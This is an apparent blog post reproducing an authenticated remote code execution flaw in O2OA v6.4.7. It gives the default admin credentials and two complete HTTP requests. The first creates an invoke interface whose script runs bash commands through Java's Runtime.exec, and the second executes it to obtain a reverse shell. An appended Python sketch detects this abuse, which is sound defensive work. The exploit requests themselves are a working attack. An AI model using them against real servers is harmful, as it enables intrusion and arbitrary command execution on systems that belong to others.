Babing
Published on 2024-08-30 / 3 Visits

O7-1O2OA-RCE


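Vulnerability description:

O2OA is an open-source (AGPL-licensed) platform for building customized enterprise information systems. It is based on a J2EE distributed architecture, integrates mobile and smart office features, supports private deployment and adaptive load handling, and can substantially reduce enterprise software development costs. O2OA v6.4.7 was found to contain a remote code execution (RCE) vulnerability via /x_program_center/jaxrs/invoke.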

Affected versions:

   O2OA v6.4.7

Network asset mapping:

FOFA query:

Vulnerability reproduction:

vulfocus online range environment

5. Exploitation flow

1. Log in to the admin console with the default credentials xadmin/o2 and reproduce the issue using a POC written by another researcher.
Project: O2OA-POC/POC.md at main · wendell1224/O2OA-POC · GitHub
Note: the POC appears to contain a typo, an extra " / ", which prevents the added interface from executing commands; delete it.
Capture the request in Burp Suite and collect the Authorization header value.
Add an interface.
payload:

POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Host: [your target host]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: [your authorization]
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 475

{"name":"abc","id":"abc","alias":"","description":"","isNewInvoke":true,"text":"\n\nvar s = [3];\ns[0] = \"/bin/bash\";\ns[1] = \"-c\";\ns[2] = \"[command]\";\nvar p = java.lang.Runtime.getRuntime().exec(s);\nvar sc = new java.util.Scanner(p.getInputStream(),\"GBK\").useDelimiter(\"\\\\A\");\nvar result = sc.hasNext() ? sc.next() : \"\";\nsc.close();","enableToken":false,"enable":true,"remoteAddrRegex":"","lastStartTime":"","lastEndTime":"","validated":true}

2. Call the command in the added interface to get a reverse shell:

POST /x_program_center/jaxrs/invoke/abc/execute?v=6.3 HTTP/1.1
Host: [your target host]
Content-Length: 0
Accept: text/html,application/json,*/*
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN
Authorization: [your authorization]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://[your target host]
Referer: http://[your target host]/x_desktop/index.html
Accept-Encoding: gzip, deflate
Cookie: 
Connection: close
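
A detection sketch for the two requests above, added here as an example and not taken from the original post or the referenced POC: it flags invoke-interface creations whose script text references Java process-execution classes, then flags later `execute` calls on those interfaces. The record format, the function name `flag_invoke_abuse`, and the assumption that the execute path uses the interface's name or id are this example's own; the sample records are constructed.

```python
import json
import re
from urllib.parse import urlsplit

INVOKE_BASE = "/x_program_center/jaxrs/invoke"
# Java classes that let a server-side script start OS processes.
PROCESS_API = re.compile(r"java\.lang\.(Runtime|ProcessBuilder)\b")

# Constructed sample records (method, URL, body), not captured traffic.
SAMPLE = [
    ("POST", INVOKE_BASE + "?v=6.3",
     json.dumps({"name": "abc", "id": "abc", "enableToken": False,
                 "text": "var p = java.lang.Runtime.getRuntime().exec(s);"})),
    ("POST", INVOKE_BASE + "?v=6.3",
     json.dumps({"name": "report", "id": "report", "enableToken": True,
                 "text": "var total = 1 + 2;"})),
    ("POST", INVOKE_BASE + "/abc/execute?v=6.3", ""),
    ("POST", INVOKE_BASE + "/report/execute?v=6.3", ""),
    ("GET", "/x_desktop/index.html", ""),
]


def flag_invoke_abuse(records):
    """Alert on invoke scripts that reach Java process APIs and on their execution."""
    alerts, risky = [], set()
    for method, url, body in records:
        path = urlsplit(url).path.rstrip("/")
        if method != "POST" or not path.startswith(INVOKE_BASE):
            continue
        rest = path[len(INVOKE_BASE):]
        if rest == "":  # interface created or updated
            try:
                doc = json.loads(body)
            except ValueError:
                doc = None
            text = doc.get("text") if isinstance(doc, dict) else None
            if PROCESS_API.search(str(text or "")):
                # Assumption: the execute URL addresses the interface by name or id.
                risky.update(v for v in (doc.get("name"), doc.get("id")) if v)
                alerts.append(("process-api-in-invoke-script", doc.get("name")))
        else:
            m = re.fullmatch(r"/([^/]+)/execute", rest)
            if m and m.group(1) in risky:
                alerts.append(("risky-invoke-executed", m.group(1)))
    return alerts


if __name__ == "__main__":
    print(flag_invoke_abuse(SAMPLE))
```

This needs request logging that records POST bodies for the invoke endpoint. Any invoke interface created by an unexpected account is worth reviewing on its own, whatever its script contains.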
